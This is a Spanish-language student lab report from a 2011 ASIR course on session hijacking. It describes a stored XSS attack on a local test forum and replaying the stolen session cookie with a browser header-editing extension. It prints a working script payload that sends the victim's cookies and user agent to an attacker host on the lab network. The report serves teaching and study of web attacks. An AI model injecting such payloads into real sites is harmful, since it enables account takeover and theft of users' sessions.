2011

SUPLANTACIN DE IDENTIDAD

EDUARDO BAYN CASCAJO (Windows XP SERVIDOR-VCTIMA) JAVIER GARCA CAMBRONEL (Windows 7 ATACANTE)

Javier Garca Cambronel y Eduardo bayn Cascajo SEGUNDO DE ASIR 20/11/2011

[SUPLANTACIN DE IDENTIDAD] 20 de noviembre de 2011

ROBO DE COOKIES
CDIGO SERVIDOR
CDIGO ATACANTE CMO CONSIGUE EL ATACANTE ENVIAR EL PARMETRO URL CON LA COOKIE?

SUPLANTACIN DE IDENTIDAD

SEGUNDO DE ASIR

Pgina 1

[SUPLANTACIN DE IDENTIDAD] 20 de noviembre de 2011

ROBO DE COOKIES SUPLANTACIN DE IDENTIDAD En el localhost de la mquina virtual 192.168.1.198/ejer (el sitio "bueno y/o vctima") tenemos una pgina web (pagina1.php). Como vemos en el cdigo hay un inicio de sesin para el nico objeto de guardar una cookie de sesin en el navegador del usuario y despus poder realizar el "robo". Luego el PHP de esta pgina lee un archivo foro.txt donde almacena entradas de mensaje de un hipottico foro. Como es una pgina de reentrada de formulario, mira si hay un GET con un mensaje para el foro, en cuyo caso lo aade al archivo foro.txt. Luego presenta los mensajes del foro y un formulario para que el usuario enve un nuevo mensaje si lo desea.

CDIGO SERVIDOR
El atacante por otro lado tiene una pgina PHP en su sitio 192.168.1.34/ejer pgina con el nombre cookies.php que contiene este cdigo:

SEGUNDO DE ASIR

Pgina 2

[SUPLANTACIN DE IDENTIDAD] 20 de noviembre de 2011 CDIGO ATACANTE

El atacante tiene un archivo de texto que se llama cookies.txt donde va a guardar las cookies robadas. Intentar enviar las cookies desde el navegador del usuario a travs de un parmetro URL llamado cookies-robadas, por lo que consultar si hay algo en el GET. Si es as lo graba en el archivo. Luego vuelve a redirigir al usuario a la pgina del foro del "sitio bueno".

CMO CONSIGUE EL ATACANTE ENVIAR EL PARMETRO URL CON LA COOKIE?

Pues por ejemplo, enviando este mensaje al foro: <script type="text/javascript">window.onunload = function(){ document.location = "http://192.168.1.34/ejer/cookies.php?cookies-robadas=" + document.cookie + "&navegador=" + navigator.userAgent;}</script> Enviamos el mensaje:

SEGUNDO DE ASIR

Pgina 3

[SUPLANTACIN DE IDENTIDAD] 20 de noviembre de 2011

Cuando uno o varios usuarios en el "sitio bueno" pulsen el botn para enviar su mensaje, entonces ste llegar al localhost de la mquina virtual (servidor) y se guardar con el resto de mensajes del foro.

Al reenviar el servidor la pgina otra vez al usuario con su mensaje actualizado en el foro, se produce un evento window.onunload de la ventana, lo que pone en ejecucin el script inyectado. Este script hace una redireccin al localhost del atacante portando como parmetro URL todas las cookies del navegador del usuario que tenga almacenadas de la mquina virtual donde est navegando.

SEGUNDO DE ASIR

Pgina 4

[SUPLANTACIN DE IDENTIDAD] 20 de noviembre de 2011

Luego ya en el sitio del atacante queda guardar esas cookies y redirigir a la mquina virtual sin que el usuario note el proceso. Consiguiendo las ansiadas Cookies.

EMPEZANDO LA SUPLANTACIN DE IDENTIDAD UNA VEZ TENEMOS LA COOKIE

Existe un programa para Firefox, que funciona como una extensin del navegador, que se puede instalar para tener informacin sobre las cabeceras del HTTP. El programa se llama LiveHttpHeaders y se puede encontrar toda la informacin, aunque en ingls, en: http://livehttpheaders.mozdev.org/ En el men "Herramientas" de Firefox (si no lo encontris haceros un favor y pulsar la tecla ALT de vuestro teclado.) se aade una opcin llamada "Live HTTP Headers", que abre una ventana con las cabeceras HTTP que se van enviando y recibiendo a medida que se navega por los sitios web. Las cabeceras aparecen en tiempo real a medida que se van generando. Una opcin en la ventana de cabeceras en tiempo real que permite repetir una solicitud al servidor web, editando las cabeceras del HTTP para cambiarlas tal como nos A nosotros nos interesa cambiarla claro que s, con la COOKIE que hemos ROBADO. Antes nos hemos metido en la pgina como atacante y nos reconoce como usuario dicindonos que nos hemos metido ya en esta pgina y la hora a la que ha sido.

SEGUNDO DE ASIR

Pgina 5

[SUPLANTACIN DE IDENTIDAD] 20 de noviembre de 2011

Antes de la modificacin vemos que la informacin del atacante mostraba era que nos hemos metido desde el ordenador del atacante el 20 de noviembre de 2011 a las 19:16:10 esa informacin la lleva la cookie no olvidemos que es un archivo con informacin (en este caso la informacin que tiene del usuario es la hora pero podra ser una contrasea, el mtodo es el mismo)

Lo que hacemos entonces es insertar el valor de la cookie que hemos robado copiamos el valor de la cookie el SID en casos en los que este encriptado completamente pues no deja de ser un valor, pero que nosotros no lo interpretamos fcilmente y es entendible por el navegador.

SEGUNDO DE ASIR

Pgina 6

[SUPLANTACIN DE IDENTIDAD] 20 de noviembre de 2011

Lo pegamos en el lugar correspondiente quedando como vemos en la imagen.

Pulsamos el botn de repetir y PERFECTO ya estamos entrando como si furamos la vctima Hemos terminado haciendo la SUPLANTACIN DE IDENTIDAD como demuestra la informacin en el navegador del atacante.

SEGUNDO DE ASIR

Pgina 7